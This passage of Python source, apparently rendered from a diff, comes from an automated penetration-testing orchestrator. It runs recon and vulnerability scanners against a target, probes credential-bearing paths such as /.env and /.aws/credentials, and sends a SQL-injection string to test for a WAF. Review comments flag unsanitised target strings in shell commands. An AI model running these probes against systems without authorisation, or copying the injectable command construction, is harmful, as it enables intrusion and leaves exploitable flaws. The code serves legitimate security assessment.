        if ret == 0:
            (self.output_dir / f"theharvester_{self.domain}.txt").write_text(output)
            # Extract lines that look like addresses on our domain
            emails = []
            for line in output.split("\n"):
                if "@" in line and self.domain in line:
                    emails.append(line.strip())
            if emails:
                findings.append(Finding(
                    type="email_discovered",
                    value=str(len(emails)),
                    description=f"Discovered {len(emails)} email addresses",
                    severity="info",
                    phase="recon",
                    tool="theHarvester",
                    target=self.domain,
                    metadata={"emails": emails[:20]}  # Store first 20
                ))
            tools_run.append("theHarvester")
            self._log_tool(f"theHarvester - {len(emails)} emails", "done")

    # 7. dnsrecon - DNS Enumeration & Zone Transfer
    if "dnsrecon" in self.config.recon_tools:
        self._log_tool("dnsrecon", "running")
        # Security: quote the output path (output_dir is user-configurable)
        dnsrecon_json = sanitize_for_shell(str(self.output_dir / f"dnsrecon_{self.domain}.json"))
        ret, output = await self._run_command(
            f"dnsrecon -d {self.safe_domain} -t std,brt -j {dnsrecon_json} 2>/dev/null",
            timeout=180
        )
        if ret == 0:
            tools_run.append("dnsrecon")
            # Check for zone transfer vulnerability
            if "Zone Transfer" in output and "Success" in output:
                findings.append(Finding(
                    type="dns_zone_transfer",
                    value="Zone transfer allowed",
                    description="DNS zone transfer is allowed - critical information disclosure",
                    severity="high",
                    phase="recon",
                    tool="dnsrecon",
                    target=self.domain
                ))
            self._log_tool("dnsrecon - completed", "done")

    # 8. wafw00f - WAF Fingerprinting
    if "wafw00f" in self.config.recon_tools:
        self._log_tool("wafw00f", "running")
        # Security: self.target is not validated like self.domain; quote it.
        ret, output = await self._run_command(
            f"wafw00f {sanitize_for_shell(self.target)} 2>/dev/null"
        )
        if ret == 0:
            (self.output_dir / f"wafw00f_{self.domain}.txt").write_text(output)
            # Parse WAF detection
            waf_name = "Unknown"
            if "is behind" in output:
                # Extract WAF name from the first "is behind" line
                for line in output.split("\n"):
                    if "is behind" in line:
                        parts = line.split("is behind")
                        if len(parts) > 1:
                            waf_name = parts[1].strip().split()[0]
                        break
                findings.append(Finding(
                    type="waf_detected",
                    value=waf_name,
                    description=f"Web Application Firewall detected: {waf_name}",
                    severity="info",
                    phase="recon",
                    tool="wafw00f",
                    target=self.target
                ))
            elif "No WAF" in output:
                findings.append(Finding(
                    type="no_waf",
                    value="No WAF detected",
                    description="No Web Application Firewall detected - target may be more vulnerable",
                    severity="low",
                    phase="recon",
                    tool="wafw00f",
                    target=self.target
                ))
            tools_run.append("wafw00f")
            self._log_tool(f"wafw00f - {waf_name if 'is behind' in output else 'No WAF'}", "done")

    # 9. whatweb - Technology Fingerprinting
    if "whatweb" in self.config.recon_tools:
        self._log_tool("whatweb", "running")
        # Security: quote both the unvalidated target and the output path.
        whatweb_json = sanitize_for_shell(str(self.output_dir / f"whatweb_{self.domain}.json"))
        ret, output = await self._run_command(
            f"whatweb -a 3 {sanitize_for_shell(self.target)} --log-json={whatweb_json} 2>/dev/null"
        )
        if ret == 0:
            (self.output_dir / f"whatweb_{self.domain}.txt").write_text(output)
            tools_run.append("whatweb")
            self._log_tool("whatweb - completed", "done")

    # Deduplicate subdomains again after new tools
    self.subdomains = list(set(self.subdomains))
    all_subs_file.write_text("\n".join(self.subdomains))

    # Add findings to global list (triggers on_finding callbacks)
    for f in findings:
        self._add_finding(f)

    duration = time.time() - start_time
    result = PhaseResult(
        phase=phase,
        status="completed",
        started_at=started_at,
        finished_at=datetime.now(timezone.utc).isoformat(),
        duration=duration,
        findings=findings,
        tools_run=tools_run,
        errors=errors,
        metadata={
            "subdomains_count": len(self.subdomains),
            "live_hosts_count": len(self.live_hosts)
        }
    )

    self.phase_results[phase] = result
    if self.on_phase_complete:
        self.on_phase_complete(result)

    return result
|
|
720
|
+
|
|
721
|
+
# ==================== SCAN PHASE ====================
|
|
722
|
+
|
|
723
|
+
    async def run_scan(self) -> PhaseResult:
        """Execute vulnerability scanning phase.

        Runs each scanner enabled in ``self.config.scan_tools`` (nuclei,
        sslscan, ffuf, nikto, wpscan, testssl, gobuster, dirsearch), optional
        enterprise scanners (Acunetix, Burp Suite), and DevSecOps checks
        (trivy, gitleaks, trufflehog).  Raw tool output is written under
        ``self.output_dir``; parsed issues become ``Finding`` objects that are
        both returned in the ``PhaseResult`` and appended to the global
        findings list via ``self._add_finding``.

        Returns:
            PhaseResult: completed-phase record with findings, tools run,
            errors, and ``scan_ids`` of any async enterprise scans in metadata.

        NOTE(review): several commands interpolate ``self.target`` directly
        into a shell string (nuclei/ffuf/nikto/wpscan/curl); only the
        sslscan/testssl calls use ``self.safe_domain``.  Presumably
        ``self.target`` is validated upstream — confirm against the
        constructor before trusting this with untrusted input.
        """
        phase = Phase.SCAN
        started_at = datetime.now(timezone.utc).isoformat()
        start_time = time.time()
        findings = []
        tools_run = []
        errors = []

        # Optional lifecycle callback before any tool runs.
        if self.on_phase_start:
            self.on_phase_start(phase)

        self._log_phase(phase, f"Vulnerability Scanning on {self.domain}")

        # 1. Nuclei Scanning
        if "nuclei" in self.config.scan_tools:
            self._log_tool("nuclei", "running")
            ret, output = await self._run_command(
                f"nuclei -u {self.target} -severity low,medium,high,critical -silent 2>/dev/null",
                timeout=600
            )
            if ret == 0:
                (self.output_dir / f"nuclei_{self.domain}.txt").write_text(output)
                tools_run.append("nuclei")

                # Parse nuclei findings
                for line in output.split("\n"):
                    if line.strip():
                        # Format: [template-id] [severity] [matched-at]
                        parts = line.split()
                        if len(parts) >= 2:
                            findings.append(Finding(
                                type="vulnerability",
                                value=parts[0] if parts else line,
                                description=line,
                                severity=self._parse_nuclei_severity(line),
                                phase="scan",
                                tool="nuclei",
                                target=self.domain
                            ))

            self._log_tool(f"nuclei - {len([f for f in findings if f.tool == 'nuclei'])} findings", "done")

        # 2. SSL/TLS Scanning
        if "sslscan" in self.config.scan_tools:
            self._log_tool("sslscan", "running")
            # Security: Use safe_domain to prevent command injection
            ret, output = await self._run_command(
                f"sslscan {self.safe_domain} 2>/dev/null"
            )
            if ret == 0:
                (self.output_dir / "sslscan_results.txt").write_text(output)
                tools_run.append("sslscan")

                # Check for weak ciphers
                if "Accepted" in output and ("RC4" in output or "DES" in output or "NULL" in output):
                    findings.append(Finding(
                        type="weak_cipher",
                        value="Weak TLS ciphers detected",
                        description="Server accepts weak cryptographic ciphers",
                        severity="medium",
                        phase="scan",
                        tool="sslscan",
                        target=self.domain
                    ))

            self._log_tool("sslscan - completed", "done")

        # 3. Directory Fuzzing
        if "ffuf" in self.config.scan_tools:
            self._log_tool("ffuf", "running")
            ret, output = await self._run_command(
                f"ffuf -u {self.target}/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc 200,301,302,403 -s 2>/dev/null | head -50",
                timeout=300
            )
            if ret == 0:
                (self.output_dir / f"ffuf_{self.domain}.txt").write_text(output)
                tools_run.append("ffuf")
                self._log_tool("ffuf - completed", "done")

        # 4. Nikto - Web Server Vulnerability Scanner (NEW)
        if "nikto" in self.config.scan_tools:
            self._log_tool("nikto", "running")
            ret, output = await self._run_command(
                f"nikto -h {self.target} -Format txt -output {self.output_dir}/nikto_{self.domain}.txt -Tuning 123bde 2>/dev/null",
                timeout=600
            )
            if ret == 0:
                tools_run.append("nikto")
                # Parse nikto findings: nikto prefixes result lines with "+ ".
                for line in output.split("\n"):
                    if "+ " in line and ("OSVDB" in line or "vulnerability" in line.lower() or "outdated" in line.lower()):
                        severity = "medium"
                        if "critical" in line.lower() or "remote" in line.lower():
                            severity = "high"
                        findings.append(Finding(
                            type="web_vulnerability",
                            value=line.strip(),
                            description=line.strip(),
                            severity=severity,
                            phase="scan",
                            tool="nikto",
                            target=self.target
                        ))
                nikto_findings = len([f for f in findings if f.tool == "nikto"])
                self._log_tool(f"nikto - {nikto_findings} findings", "done")

        # 5. WPScan - WordPress Vulnerability Scanner (NEW)
        if "wpscan" in self.config.scan_tools:
            self._log_tool("wpscan", "running")
            # Check if WordPress before paying for a full wpscan run.
            ret, check_output = await self._run_command(
                f"curl -sL {self.target}/wp-login.php --connect-timeout 5 | head -1"
            )
            if "wp-" in check_output.lower() or "wordpress" in check_output.lower():
                # API token is optional; without it wpscan omits vuln data.
                wpscan_token = os.getenv("WPSCAN_API_TOKEN", "")
                token_flag = f"--api-token {wpscan_token}" if wpscan_token else ""
                ret, output = await self._run_command(
                    f"wpscan --url {self.target} {token_flag} --enumerate vp,vt,u --format json --output {self.output_dir}/wpscan_{self.domain}.json 2>/dev/null",
                    timeout=600
                )
                if ret == 0:
                    tools_run.append("wpscan")
                    # Parse JSON output
                    try:
                        wpscan_file = self.output_dir / f"wpscan_{self.domain}.json"
                        if wpscan_file.exists():
                            wpscan_data = json.loads(wpscan_file.read_text())
                            # NOTE(review): assumes a top-level "vulnerabilities"
                            # key in the wpscan JSON report — verify against the
                            # wpscan output schema for the pinned version.
                            vulns = wpscan_data.get("vulnerabilities", [])
                            for vuln in vulns:
                                findings.append(Finding(
                                    type="wordpress_vulnerability",
                                    value=vuln.get("title", "Unknown"),
                                    description=vuln.get("description", vuln.get("title", "")),
                                    severity=self._map_wpscan_severity(vuln.get("severity", "medium")),
                                    phase="scan",
                                    tool="wpscan",
                                    target=self.target,
                                    metadata={"cve": vuln.get("cve", [])}
                                ))
                    except (json.JSONDecodeError, FileNotFoundError):
                        pass
                    self._log_tool(f"wpscan - WordPress detected", "done")
            else:
                self._log_tool("wpscan - Not WordPress, skipped", "done")

        # 6. testssl.sh - Comprehensive SSL/TLS Testing (NEW)
        if "testssl" in self.config.scan_tools:
            self._log_tool("testssl", "running")
            ret, output = await self._run_command(
                f"testssl --jsonfile {self.output_dir}/testssl_{self.domain}.json --severity LOW {self.safe_domain} 2>/dev/null",
                timeout=300
            )
            if ret == 0:
                (self.output_dir / f"testssl_{self.domain}.txt").write_text(output)
                tools_run.append("testssl")
                # Parse for critical SSL issues
                ssl_issues = []
                for line in output.split("\n"):
                    if "VULNERABLE" in line or "NOT ok" in line:
                        ssl_issues.append(line.strip())
                        severity = "high" if "VULNERABLE" in line else "medium"
                        findings.append(Finding(
                            type="ssl_vulnerability",
                            value=line.strip()[:100],
                            description=line.strip(),
                            severity=severity,
                            phase="scan",
                            tool="testssl",
                            target=self.domain
                        ))
                self._log_tool(f"testssl - {len(ssl_issues)} issues", "done")

        # 7. Gobuster - Directory/Vhost Enumeration (NEW)
        if "gobuster" in self.config.scan_tools:
            self._log_tool("gobuster", "running")
            ret, output = await self._run_command(
                f"gobuster dir -u {self.target} -w /usr/share/wordlists/dirb/common.txt -q -t 20 --no-error 2>/dev/null | head -100",
                timeout=300
            )
            if ret == 0:
                (self.output_dir / f"gobuster_{self.domain}.txt").write_text(output)
                tools_run.append("gobuster")
                # Parse discovered paths
                for line in output.split("\n"):
                    if line.strip() and ("Status:" in line or "(Status:" in line):
                        # Check for interesting paths
                        if any(p in line.lower() for p in ["admin", "backup", "config", "api", "debug", ".git"]):
                            findings.append(Finding(
                                type="interesting_path",
                                value=line.strip(),
                                description=f"Potentially sensitive path discovered: {line.strip()}",
                                severity="low",
                                phase="scan",
                                tool="gobuster",
                                target=self.target
                            ))
                self._log_tool("gobuster - completed", "done")

        # 8. Dirsearch - Advanced Directory Discovery (NEW)
        if "dirsearch" in self.config.scan_tools:
            self._log_tool("dirsearch", "running")
            ret, output = await self._run_command(
                f"dirsearch -u {self.target} -e php,asp,aspx,jsp,html,js -t 20 --format plain -o {self.output_dir}/dirsearch_{self.domain}.txt 2>/dev/null",
                timeout=300
            )
            if ret == 0:
                tools_run.append("dirsearch")
                self._log_tool("dirsearch - completed", "done")

        # 9. Acunetix DAST Scan (Enterprise)
        if self.config.use_acunetix:
            self._log_tool("Acunetix DAST", "running")
            try:
                acunetix = get_acunetix()
                if acunetix.connect():
                    # Start scan with the configured profile (default full).
                    profile_map = {
                        "full": ScanProfile.FULL_SCAN,
                        "high_risk": ScanProfile.HIGH_RISK,
                        "xss": ScanProfile.XSS_SCAN,
                        "sqli": ScanProfile.SQL_INJECTION,
                    }
                    profile = profile_map.get(self.config.acunetix_profile, ScanProfile.FULL_SCAN)

                    scan_id = acunetix.scan_url(self.target, profile, f"AIPT Scan - {self.timestamp}")
                    self.scan_ids["acunetix"] = scan_id

                    # Save scan info so the async scan can be found later.
                    scan_info = {
                        "scan_id": scan_id,
                        "target": self.target,
                        "profile": self.config.acunetix_profile,
                        "started_at": datetime.now(timezone.utc).isoformat(),
                        "dashboard_url": f"{acunetix.config.base_url}/#/scans/{scan_id}"
                    }
                    (self.output_dir / "acunetix_scan.json").write_text(json.dumps(scan_info, indent=2))

                    tools_run.append("acunetix")
                    self._log_tool(f"Acunetix - Scan started: {scan_id[:8]}...", "done")

                    # Optionally wait for completion (otherwise fire-and-forget).
                    if self.config.wait_for_scanners:
                        self._log_tool("Acunetix - Waiting for completion...", "running")
                        result = acunetix.wait_for_scan(
                            scan_id,
                            timeout=self.config.scanner_timeout,
                            poll_interval=30
                        )

                        # Get vulnerabilities
                        vulns = acunetix.get_scan_vulnerabilities(scan_id)
                        for vuln in vulns:
                            findings.append(Finding(
                                type="vulnerability",
                                value=vuln.name,
                                description=vuln.description or vuln.name,
                                severity=vuln.severity,
                                phase="scan",
                                tool="acunetix",
                                target=vuln.affected_url,
                                metadata={
                                    "vuln_id": vuln.vuln_id,
                                    "cvss": vuln.cvss_score,
                                    "cwe": vuln.cwe_id
                                }
                            ))

                        self._log_tool(f"Acunetix - {len(vulns)} vulnerabilities found", "done")
                else:
                    errors.append("Acunetix connection failed")
                    self._log_tool("Acunetix - Connection failed", "error")
            except Exception as e:
                errors.append(f"Acunetix error: {str(e)}")
                self._log_tool(f"Acunetix - Error: {str(e)}", "error")

        # 5. Burp Suite Scan (Enterprise)
        # NOTE(review): numbering restarts at 5 here — comment numbering only,
        # no behavioral impact.
        if self.config.use_burp:
            self._log_tool("Burp Suite", "running")
            try:
                burp = get_burp()
                if burp.connect():
                    # Burp scans are fire-and-forget; only the id is recorded.
                    scan_id = burp.scan_url(self.target)
                    self.scan_ids["burp"] = scan_id
                    tools_run.append("burp")
                    self._log_tool(f"Burp Suite - Scan started: {scan_id}", "done")
                else:
                    errors.append("Burp Suite connection failed")
            except Exception as e:
                errors.append(f"Burp Suite error: {str(e)}")

        # ==================== CONTAINER SECURITY (DevSecOps) ====================
        # 10. Trivy - Container/Image Vulnerability Scanner
        if self.config.enable_container_scan or self.config.full_mode:
            self._log_tool("trivy", "running")
            try:
                # Scan any discovered container images or Docker configuration
                # NOTE(review): docker_compose/dockerfile/has_docker are computed
                # but never used below — looks like leftover scaffolding.
                docker_compose = self.output_dir / "docker-compose.yml"
                dockerfile = self.output_dir / "Dockerfile"

                # First, try to detect Docker presence via common paths
                ret, output = await self._run_command(
                    f"curl -sI {self.target}/docker-compose.yml --connect-timeout 5 | head -1",
                    timeout=10
                )
                has_docker = "200" in output

                # Scan web target for container-related vulnerabilities
                # NOTE(review): "trivy fs ... ." scans the current working
                # directory, not the remote target — confirm the intended path.
                ret, trivy_output = await self._run_command(
                    f"trivy fs --severity {self.config.trivy_severity} --format json --output {self.output_dir}/trivy_{self.domain}.json . 2>/dev/null",
                    timeout=300
                )
                if ret == 0:
                    tools_run.append("trivy")
                    # Parse trivy JSON output
                    trivy_file = self.output_dir / f"trivy_{self.domain}.json"
                    if trivy_file.exists():
                        try:
                            trivy_data = json.loads(trivy_file.read_text())
                            for result in trivy_data.get("Results", []):
                                for vuln in result.get("Vulnerabilities", []):
                                    severity = vuln.get("Severity", "UNKNOWN").lower()
                                    findings.append(Finding(
                                        type="container_vulnerability",
                                        value=vuln.get("VulnerabilityID", "Unknown"),
                                        description=f"{vuln.get('PkgName', '')}: {vuln.get('Title', vuln.get('VulnerabilityID', ''))}",
                                        severity=severity if severity in ["critical", "high", "medium", "low"] else "medium",
                                        phase="scan",
                                        tool="trivy",
                                        target=self.target,
                                        metadata={
                                            "cve": vuln.get("VulnerabilityID"),
                                            "package": vuln.get("PkgName"),
                                            "installed_version": vuln.get("InstalledVersion"),
                                            "fixed_version": vuln.get("FixedVersion"),
                                            "cvss": vuln.get("CVSS", {})
                                        }
                                    ))
                        except (json.JSONDecodeError, FileNotFoundError):
                            pass
                    trivy_findings = len([f for f in findings if f.tool == "trivy"])
                    self._log_tool(f"trivy - {trivy_findings} vulnerabilities", "done")
                else:
                    self._log_tool("trivy - not installed or failed", "skip")
            except Exception as e:
                errors.append(f"Trivy error: {str(e)}")
                self._log_tool(f"trivy - error: {str(e)}", "error")

        # ==================== SECRET DETECTION (DevSecOps) ====================
        # 11. Gitleaks - Secret Detection in Git Repos
        if self.config.enable_secret_detection or self.config.full_mode:
            self._log_tool("gitleaks", "running")
            try:
                # Check if .git is exposed
                ret, git_check = await self._run_command(
                    f"curl -sI {self.target}/.git/config --connect-timeout 5 | head -1",
                    timeout=10
                )
                if "200" in git_check:
                    findings.append(Finding(
                        type="exposed_git",
                        value=f"{self.target}/.git/config",
                        description="Git repository exposed - potential source code and credentials leak",
                        severity="critical",
                        phase="scan",
                        tool="gitleaks",
                        target=self.target
                    ))

                # Run gitleaks on local output directory for any downloaded content
                ret, gitleaks_output = await self._run_command(
                    f"gitleaks detect --source {self.output_dir} --report-path {self.output_dir}/gitleaks_{self.domain}.json --report-format json 2>/dev/null",
                    timeout=120
                )
                if ret == 0 or ret == 1:  # gitleaks returns 1 when secrets found
                    tools_run.append("gitleaks")
                    gitleaks_file = self.output_dir / f"gitleaks_{self.domain}.json"
                    if gitleaks_file.exists():
                        try:
                            gitleaks_data = json.loads(gitleaks_file.read_text())
                            # Report is a JSON array; ignore any other shape.
                            for secret in gitleaks_data if isinstance(gitleaks_data, list) else []:
                                findings.append(Finding(
                                    type="secret_detected",
                                    value=secret.get("RuleID", "Unknown"),
                                    description=f"Secret detected: {secret.get('Description', secret.get('RuleID', 'Unknown secret'))}",
                                    severity="high" if "api" in secret.get("RuleID", "").lower() or "key" in secret.get("RuleID", "").lower() else "medium",
                                    phase="scan",
                                    tool="gitleaks",
                                    target=secret.get("File", self.target),
                                    metadata={
                                        "rule": secret.get("RuleID"),
                                        "file": secret.get("File"),
                                        "line": secret.get("StartLine"),
                                        # Truncate the matched secret to avoid
                                        # leaking full credentials into reports.
                                        "match": secret.get("Match", "")[:50] + "..." if len(secret.get("Match", "")) > 50 else secret.get("Match", "")
                                    }
                                ))
                        except (json.JSONDecodeError, FileNotFoundError):
                            pass
                    gitleaks_count = len([f for f in findings if f.tool == "gitleaks"])
                    self._log_tool(f"gitleaks - {gitleaks_count} secrets found", "done")
                else:
                    self._log_tool("gitleaks - not installed", "skip")
            except Exception as e:
                errors.append(f"Gitleaks error: {str(e)}")
                self._log_tool(f"gitleaks - error: {str(e)}", "error")

            # 12. TruffleHog - Deep Secret Scanning
            self._log_tool("trufflehog", "running")
            try:
                ret, trufflehog_output = await self._run_command(
                    f"trufflehog filesystem {self.output_dir} --json --only-verified 2>/dev/null > {self.output_dir}/trufflehog_{self.domain}.json",
                    timeout=180
                )
                if ret == 0:
                    tools_run.append("trufflehog")
                    trufflehog_file = self.output_dir / f"trufflehog_{self.domain}.json"
                    if trufflehog_file.exists() and trufflehog_file.stat().st_size > 0:
                        try:
                            # TruffleHog outputs JSONL (one JSON per line)
                            for line in trufflehog_file.read_text().strip().split("\n"):
                                if line.strip():
                                    secret = json.loads(line)
                                    findings.append(Finding(
                                        type="verified_secret",
                                        value=secret.get("DetectorName", "Unknown"),
                                        description=f"Verified secret: {secret.get('DetectorName', 'Unknown')} - {secret.get('DecoderName', '')}",
                                        severity="critical",  # Verified secrets are critical
                                        phase="scan",
                                        tool="trufflehog",
                                        target=secret.get("SourceMetadata", {}).get("Data", {}).get("Filesystem", {}).get("file", self.target),
                                        metadata={
                                            "detector": secret.get("DetectorName"),
                                            "verified": secret.get("Verified", False),
                                            # Truncated so raw secrets don't land in reports.
                                            "raw": secret.get("Raw", "")[:30] + "..." if len(secret.get("Raw", "")) > 30 else secret.get("Raw", "")
                                        }
                                    ))
                        except (json.JSONDecodeError, FileNotFoundError):
                            pass
                    trufflehog_count = len([f for f in findings if f.tool == "trufflehog"])
                    self._log_tool(f"trufflehog - {trufflehog_count} verified secrets", "done")
                else:
                    self._log_tool("trufflehog - not installed", "skip")
            except Exception as e:
                errors.append(f"TruffleHog error: {str(e)}")
                self._log_tool(f"trufflehog - error: {str(e)}", "error")

        # Add findings to global list
        for f in findings:
            self._add_finding(f)

        duration = time.time() - start_time
        result = PhaseResult(
            phase=phase,
            status="completed",
            started_at=started_at,
            finished_at=datetime.now(timezone.utc).isoformat(),
            duration=duration,
            findings=findings,
            tools_run=tools_run,
            errors=errors,
            metadata={
                "scan_ids": self.scan_ids
            }
        )

        self.phase_results[phase] = result
        if self.on_phase_complete:
            self.on_phase_complete(result)

        return result
|
|
1193
|
+
|
|
1194
|
+
def _parse_nuclei_severity(self, line: str) -> str:
|
|
1195
|
+
"""Parse severity from nuclei output line."""
|
|
1196
|
+
line_lower = line.lower()
|
|
1197
|
+
if "critical" in line_lower:
|
|
1198
|
+
return "critical"
|
|
1199
|
+
elif "high" in line_lower:
|
|
1200
|
+
return "high"
|
|
1201
|
+
elif "medium" in line_lower:
|
|
1202
|
+
return "medium"
|
|
1203
|
+
elif "low" in line_lower:
|
|
1204
|
+
return "low"
|
|
1205
|
+
return "info"
|
|
1206
|
+
|
|
1207
|
+
def _map_wpscan_severity(self, severity: str) -> str:
|
|
1208
|
+
"""Map WPScan severity to standard severity levels."""
|
|
1209
|
+
severity_map = {
|
|
1210
|
+
"critical": "critical",
|
|
1211
|
+
"high": "high",
|
|
1212
|
+
"medium": "medium",
|
|
1213
|
+
"low": "low",
|
|
1214
|
+
"info": "info",
|
|
1215
|
+
"informational": "info"
|
|
1216
|
+
}
|
|
1217
|
+
return severity_map.get(severity.lower(), "medium")
|
|
1218
|
+
|
|
1219
|
+
# ==================== ANALYZE PHASE (Intelligence Module) ====================
|
|
1220
|
+
|
|
1221
|
+
    async def run_analyze(self) -> PhaseResult:
        """
        Execute intelligence analysis phase.

        This phase runs after SCAN to:
        1. Discover attack chains (vulnerability combinations)
        2. Prioritize findings by real-world exploitability
        3. Generate executive summary

        Returns a ``PhaseResult``; when the intelligence module is disabled
        (or no chainer is configured) the phase is recorded as "skipped".

        NOTE(review): the skipped path returns early without invoking
        ``self.on_phase_complete`` — confirm that asymmetry with the other
        phases is intentional.
        """
        phase = Phase.ANALYZE
        started_at = datetime.now(timezone.utc).isoformat()
        start_time = time.time()
        findings = []
        tools_run = []
        errors = []

        if self.on_phase_start:
            self.on_phase_start(phase)

        self._log_phase(phase, f"Intelligence Analysis for {self.domain}")

        # Short-circuit: record a skipped phase when intelligence is off.
        if not self.config.enable_intelligence or not self._vuln_chainer:
            self._log_tool("Intelligence module disabled", "skip")
            duration = time.time() - start_time
            result = PhaseResult(
                phase=phase,
                status="skipped",
                started_at=started_at,
                finished_at=datetime.now(timezone.utc).isoformat(),
                duration=duration,
                findings=[],
                tools_run=[],
                errors=[],
                metadata={"reason": "Intelligence module disabled"}
            )
            self.phase_results[phase] = result
            return result

        # =====================================================================
        # 1. Vulnerability Chaining - Discover attack paths
        # =====================================================================
        self._log_tool("Vulnerability Chaining", "running")
        try:
            # Convert findings to format expected by chainer
            finding_dicts = []
            for f in self.findings:
                finding_dicts.append({
                    "title": f.value,
                    "type": f.type,
                    "severity": f.severity,
                    "url": f.target or self.target,
                    "description": f.description,
                    "tool": f.tool,
                })

            chains = self._vuln_chainer.find_chains(finding_dicts)
            self.attack_chains = chains

            if chains:
                tools_run.append("vulnerability_chainer")
                self._log_tool(f"Vulnerability Chaining - {len(chains)} attack chains discovered", "done")

                # Log critical chains
                for chain in chains:
                    if chain.max_impact == "Critical":
                        logger.warning(f"CRITICAL CHAIN: {chain.title} - {chain.impact_description}")

                        # Add as finding (only critical-impact chains become findings)
                        findings.append(Finding(
                            type="attack_chain",
                            value=chain.title,
                            description=chain.impact_description,
                            severity="critical",
                            phase="analyze",
                            tool="vulnerability_chainer",
                            target=self.domain,
                            metadata={
                                "chain_id": chain.chain_id,
                                "steps": len(chain.links),
                                "vulnerabilities": [link.finding.get("title", "") for link in chain.links]
                            }
                        ))

                    # Notify callback
                    if self.on_chain_discovered:
                        self.on_chain_discovered(chain)

                # Save chains to file
                chains_data = [c.to_dict() for c in chains]
                (self.output_dir / "attack_chains.json").write_text(json.dumps(chains_data, indent=2))
            else:
                self._log_tool("Vulnerability Chaining - No chains found", "done")

        except Exception as e:
            errors.append(f"Chaining error: {str(e)}")
            self._log_tool(f"Vulnerability Chaining - Error: {e}", "error")

        # =====================================================================
        # 2. AI-Powered Triage - Prioritize by exploitability
        # =====================================================================
        self._log_tool("AI Triage", "running")
        try:
            # NOTE(review): same dict conversion as above — a shared helper
            # would avoid the duplication.
            finding_dicts = []
            for f in self.findings:
                finding_dicts.append({
                    "title": f.value,
                    "type": f.type,
                    "severity": f.severity,
                    "url": f.target or self.target,
                    "description": f.description,
                    "tool": f.tool,
                })

            triage_result = self._ai_triage.triage(finding_dicts)
            self.triage_result = triage_result

            tools_run.append("ai_triage")

            # Save triage results
            (self.output_dir / "triage_result.json").write_text(
                json.dumps(triage_result.to_dict(), indent=2)
            )

            # Save executive summary
            (self.output_dir / "EXECUTIVE_SUMMARY.md").write_text(triage_result.executive_summary)

            # Log top priorities
            if triage_result.top_priorities:
                top_titles = [f["title"] for f in triage_result.top_priorities[:3]]
                self._log_tool(f"AI Triage - Top priorities: {', '.join(top_titles)}", "done")
            else:
                self._log_tool("AI Triage - No high-priority findings", "done")

        except Exception as e:
            errors.append(f"Triage error: {str(e)}")
            self._log_tool(f"AI Triage - Error: {e}", "error")

        # =====================================================================
        # 3. Scope Audit - Check for violations
        # =====================================================================
        if self._scope_enforcer:
            self._log_tool("Scope Audit", "running")
            violations = self._scope_enforcer.get_violations()
            if violations:
                self._log_tool(f"Scope Audit - {len(violations)} violations detected!", "done")
                # Save audit log
                audit_log = self._scope_enforcer.get_audit_log()
                (self.output_dir / "scope_audit.json").write_text(json.dumps(audit_log, indent=2))
            else:
                self._log_tool("Scope Audit - All requests within scope", "done")
            tools_run.append("scope_audit")

        # Add findings to global list
        for f in findings:
            self._add_finding(f)

        duration = time.time() - start_time
        result = PhaseResult(
            phase=phase,
            status="completed",
            started_at=started_at,
            finished_at=datetime.now(timezone.utc).isoformat(),
            duration=duration,
            findings=findings,
            tools_run=tools_run,
            errors=errors,
            metadata={
                "attack_chains_count": len(self.attack_chains),
                "top_priorities_count": len(self.triage_result.top_priorities) if self.triage_result else 0,
                "scope_violations": len(self._scope_enforcer.get_violations()) if self._scope_enforcer else 0
            }
        )

        self.phase_results[phase] = result
        if self.on_phase_complete:
            self.on_phase_complete(result)

        return result
|
|
1399
|
+
|
|
1400
|
+
# ==================== EXPLOIT PHASE ====================
|
|
1401
|
+
|
|
1402
|
+
async def run_exploit(self) -> PhaseResult:
    """
    Execute exploitation/validation phase.

    Probes a fixed list of sensitive paths, does a crude WAF check, and —
    when ``full_mode``/``enable_exploitation`` is set — drives sqlmap,
    commix, xsstrike, hydra and searchsploit against the target. Finally
    pulls Acunetix results if a scan id is present and the orchestrator is
    not configured to wait for scanners.

    Returns:
        PhaseResult: aggregated findings/tools/errors for the EXPLOIT
        phase; also stored in ``self.phase_results`` and reported through
        the ``on_phase_complete`` callback when set.
    """
    phase = Phase.EXPLOIT
    started_at = datetime.now(timezone.utc).isoformat()
    start_time = time.time()
    findings = []      # Finding objects produced by this phase only
    tools_run = []     # names of tools that actually executed
    errors = []        # non-fatal error strings surfaced in the result

    if self.on_phase_start:
        self.on_phase_start(phase)

    self._log_phase(phase, f"Vulnerability Validation on {self.domain}")

    # 1. Check Sensitive Endpoints
    if self.config.check_sensitive_paths:
        self._log_tool("Sensitive Path Check", "running")

        # Common secrets/debug/admin endpoints worth a cheap HEAD-style probe.
        sensitive_paths = [
            "/metrics", "/actuator", "/actuator/health", "/actuator/env",
            "/.env", "/.git/config", "/swagger-ui.html", "/api/swagger",
            "/graphql", "/debug", "/admin", "/phpinfo.php",
            "/server-status", "/.aws/credentials", "/backup"
        ]

        for path in sensitive_paths:
            try:
                # NOTE(review): self.target is interpolated into a shell
                # string; a target containing quotes could break or inject
                # the command — confirm upstream sanitization of target.
                ret, output = await self._run_command(
                    f"curl -s -o /dev/null -w '%{{http_code}}' '{self.target}{path}' --connect-timeout 5",
                    timeout=10
                )
                # Only the HTTP status code is printed by curl's -w format.
                if ret == 0 and output.strip() in ["200", "301", "302"]:
                    # Credential-bearing files are rated higher than generic endpoints.
                    severity = "high" if path in ["/.env", "/.git/config", "/.aws/credentials"] else "medium"
                    findings.append(Finding(
                        type="exposed_endpoint",
                        value=f"{self.target}{path}",
                        description=f"Sensitive endpoint accessible: {path} (HTTP {output.strip()})",
                        severity=severity,
                        phase="exploit",
                        tool="path_check",
                        target=self.target
                    ))
            except Exception:
                # Best effort per path; one failure must not stop the sweep.
                continue

        exposed_count = len([f for f in findings if f.type == "exposed_endpoint"])
        tools_run.append("sensitive_path_check")
        self._log_tool(f"Sensitive Path Check - {exposed_count} exposed", "done")

    # 2. WAF Detection — send a trivially malicious query string and see
    # whether the response line carries a blocking status code.
    self._log_tool("WAF Detection", "running")
    ret, output = await self._run_command(
        f"curl -sI \"{self.target}/?id=1'%20OR%20'1'='1\" --connect-timeout 5 | head -1",
        timeout=10
    )
    # 403/406/429 on the status line is treated as "a WAF intervened".
    waf_detected = "403" in output or "406" in output or "429" in output
    (self.output_dir / "waf_test.txt").write_text(f"WAF Test Response: {output}\nWAF Detected: {waf_detected}")
    tools_run.append("waf_detection")

    if not waf_detected:
        findings.append(Finding(
            type="waf_bypass",
            value="No WAF detected",
            description="Target does not appear to have a WAF or WAF is not blocking",
